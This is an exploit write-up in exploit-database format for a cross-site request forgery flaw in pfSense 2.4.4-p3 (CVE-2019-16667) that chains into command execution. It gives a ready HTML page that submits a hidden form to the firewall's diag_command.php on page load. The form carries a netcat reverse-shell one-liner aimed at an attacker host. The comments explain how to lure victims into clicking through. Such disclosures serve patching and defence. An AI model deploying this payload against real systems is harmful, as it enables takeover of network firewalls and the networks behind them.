# Exploit Title: pfSense 2.4.4-p3 - Cross-Site Request Forgery# Date: 2019-09-27# Exploit Author: ghost_fh# Vendor Homepage: https://www.pfsense.org/# Software Link: https://www.pfsense.org/download/index.html?section=downloads# Version: Till 2.4.4-p3# Tested on: freebsd# CVE : CVE-2019-16667# Vulnerability Description :- The pfsense firewall is vulnerable to RCE# chained with CSRF as it uses `csrf magic` library since it allows to tamper# the CSRF token values submitted when processing the form requests. Due to# this flaw, an attacker can exploit this vulnerability by crafting new page# that contains attacker's controlled input such as a "reverse shell" (eg:# `rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc attackerip port# >/tmp/f`token value) in the form and entice the victims to click# on the crafted link via social engineering methods. Once the victim clicks# on the link (try again button in this case), the attacker can take the# lateral control of the victim's machine and malicious actions can be# performed on the victim's behalf.<!DOCTYPE html><html><body onload="document.createElement('form').submit.call(document.getElementById('myForm'))"><form id="myForm" action="https://pfsense_ip/diag_command.php" method="POST"><inputtype=hidden name="txtCommand" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|
nc attacker_ip attacker_port >/tmp/f"><inputtype=hidden name="txtRecallBuffer" value="rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i
2>&1|nc attacker_ip attacker_port >/tmp/f"><inputtype=hidden name="dlPath" value=""><inputtype=hidden name="txtPHPCommand" value=""><inputtype="hidden" name="submit" value="EXEC"></form></body></html># Create a malicious page containing the above values and once user clicks on malicious link, # he will be redirected to https://pfsense_ip/diag_command.php page.# Victim will be greeted with the "Try again" button.# Once victim clicks on the "Try again" button you will be greeted with reverse shell of the victim.
